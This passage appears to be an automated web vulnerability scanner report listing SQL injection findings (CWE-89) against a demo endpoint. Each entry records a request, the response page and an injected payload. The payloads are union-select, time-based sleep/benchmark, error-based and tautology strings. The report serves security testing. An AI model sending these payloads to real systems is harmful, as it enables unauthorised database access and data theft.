[(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1249\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1250\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '%20and%201=2%20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1251\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+\nCHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (\n5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113\n)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1252\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')\n)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1253\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1254\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# sleep(5)#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1255\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# pg_SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1256Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1257\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# %2c(select%20*%20from%20(select(sleep(10)))a)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1258\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' OR '' = '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1259\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1260\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1261\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1262\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue 